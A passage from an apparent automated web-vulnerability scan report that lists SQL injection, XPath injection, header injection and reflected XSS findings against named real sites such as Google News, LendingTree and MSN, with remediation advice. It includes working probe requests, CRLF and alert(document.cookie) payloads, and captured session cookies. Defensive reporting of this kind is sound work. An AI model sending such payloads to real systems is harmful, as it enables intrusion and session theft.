GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1''&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:40:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.17. http://news.google.com/news/story [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.google.com
Path:   /news/story

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/story HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q="

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=EYtHjiYP5kOB7gTcEAAy1Jtw9LIAHRdjqdU_4_7j9uSCko6Gh0azHUYusGbifXTXcYEqyKocrdBs80Bh6bDWIuEn2OfLiIDq4LoIRKO8fcCXiyHs_5xz2mVk7MM0B_ky;Domain=.google.com;Path=/;Expires=Wed, 03-Aug-2011 15:37:34 GMT;HttpOnly
Date: Tue, 01 Feb 2011 15:37:34 GMT
Expires: Tue, 01 Feb 2011 15:37:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
4J2H2Wkg4gnMQE_p195fMUAgpcYIJDx3t6nec_c3lUnCVmWZbc_9ZeNoniVbpA7w12s9pN6LyGsevEpyJYhJ6I5oVGvf9uODE4dFv4Sa56mF-bgTriJon7LM5OQPrJx-Ba3v1gkLXwM0lS1nMnwUXa_mPtsJLog92IUPKygEGcxUdj8_KZ6pSr36M6ZnpubYu4k0GbM_wORA-3s3PCXoiAukf4CILbvlAfvTcSoBZtxbTjMbbvbHKfXqbzI-_5gpc5CxOpFcoscw3IsBQvavUYkgZvE-UL059BwpBY0MNrIlUr4WHVPXpPkAHOzQRuShQ-BMYPRGLnRabtOxD-XDuZx_Y0ZyVD61nhZTHjpTTBxw95QaJ1yZDUKfVal2_dEB7PO59pYfTUWMtZUgVAGRviG
...[SNIP]...

1.18. http://offers.lendingtree.com/splitter/splitter.ashx [800Num parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://offers.lendingtree.com
Path:   /splitter/splitter.ashx

Issue detail

The 800Num parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 800Num parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2 HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 15:38:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3rvf2azbtvqvcurys2gfk355; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Nickname: Shaggy
X-Powered-By: ASP.NET
Content-Length: 30033
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...


       if(promoID == null) return;

Tree.API.LendingTree.getPromoInfo(promoID, function(promoInfo) {


if (promoInfo == null || promoInfo.Status != "1") { // invalid promo resort to default

Tree.API.LendingTree.getPromoInfo(defaultPromoID, function(promoInfo) {

prepopPromoObject(promoInfo)

...[SNIP]...

Request 2

GET /splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731''&adtype=2 HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 15:38:25 GMT
Location: http://offers.lendingtree.com/splitter/splitter.ashx?id=displaysfrefidirect&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731''&adtype=2
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Nickname: Shaggy
X-Powered-By: ASP.NET
Content-Length: 290
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://offers.lendingtree.com/splitter/splitter.ashx?id=displaysfrefidirect&amp;promo=00313&amp;source=4666360&amp;es
...[SNIP]...

1.19. http://www.google.com/finance [hl\x3den\x26tab\x3dwe\x22 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.google.com
Path:   /finance

Issue detail

The hl\x3den\x26tab\x3dwe\x22 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl\x3den\x26tab\x3dwe\x22 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /finance?hl\x3den\x26tab\x3dwe\x22' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 1

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:47 GMT
Expires: Wed, 02 Feb 2011 15:53:47 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
<div class=snippet>By Ryan Vlastelica NEW YORK, Feb 2 (Reuters) - US stocks were little changed on Wednesday as a strong reading on the labor market failed to extend gains a day after the Dow and S&amp;P reached their highest close in about 2-1/2 years.</div>
...[SNIP]...

Request 2

GET /finance?hl\x3den\x26tab\x3dwe\x22'' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 2

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:47 GMT
Expires: Wed, 02 Feb 2011 15:53:47 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

1.20. http://www.hotelclub.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 13176
Content-Type: text/html; Charset=windows-1252
Expires: Wed, 02 Feb 2011 15:58:39 GMT
Cache-Control: private
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:59:40 GMT
Connection: close
Set-Cookie: ltvisit=%7BA1C36645%2DB155%2D4858%2DA1E8%2D701A315C8806%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQCDQDRTT=GNEIPJKDPDKCKEAIKMCFGKKD; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273445525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 13176


<html>
<head>


<title>Under Maintenance</title>
<meta name=robots content=noindex,nofollow>


<link rel="stylesheet" id="main-css" href="/Private/styles/styles.css" type="text/css">

...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 228109
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 15:59:36 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Date: Wed, 02 Feb 2011 15:59:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E1; path=/
Set-Cookie: AffiliateLogID=%2D2078738119; expires=Fri, 04-Mar-2011 13:00:00 GMT; path=/
Set-Cookie: ltvisit=%7BD4EBE398%2DB8FE%2D4B7D%2D9079%2D5C17098A1DC7%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACTBCTST=NNLDPPJDCLHLLKGJCOELHMHF; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273a45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 228109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

2. XPath injection  previous  next
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://entertainment.msn.com/news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /news'/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c371288793344ba29799f891089f3489; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:35:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

2.2. http://entertainment.msn.com/video/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /video'/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c0b4ae52bcfc4e1eb9d3383e05f466fb; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:33:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f134%0d%0a61816c1ba6c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f134%0d%0a61816c1ba6c/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f134
61816c1ba6c
/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http: //ad.thewheelof.com/clk
Date: Wed, 02 Feb 2011 15:33:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15468%0d%0a61dc607be51 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15468%0d%0a61dc607be51/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15468
61dc607be51
/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http: //ad.thewheelof.com/clk
Date: Wed, 02 Feb 2011 15:33:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4. Cross-site scripting (reflected)  previous  next
There are 710 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

